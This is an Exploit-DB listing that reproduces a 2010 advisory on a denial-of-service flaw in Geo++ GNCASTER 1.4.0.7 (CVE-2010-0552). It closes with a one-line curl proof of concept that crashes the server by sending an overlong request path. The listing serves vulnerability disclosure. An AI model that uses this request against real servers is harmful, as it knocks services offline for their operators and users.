Geo++ GNCASTER 1.4.0.7 HTTP GET Request Denial Of Service Vulnerability

2010-01-27T00:00:00
ID EDB-ID:33965
Type exploitdb
Reporter RedTeam Pentesting GmbH
Modified 2010-01-27T00:00:00

Description

Geo++ GNCASTER 1.4.0.7 HTTP GET Request Denial Of Service Vulnerability. CVE-2010-0552. Dos exploit for linux platform

                                        
                                            source: http://www.securityfocus.com/bid/40009/info

Geo++ GNCASTER is prone to a denial-of-service vulnerability.

An attacker can exploit this issue to cause the application to crash, resulting in a denial-of-service condition. Arbitrary code-execution may also be possible; this has not been confirmed.

Geo++ GNCASTER 1.4.0.7 is vulnerable; other versions may also be affected. 

$ curl -i "http://www.example.com:1234/`perl -e 'printf "A"x988'`"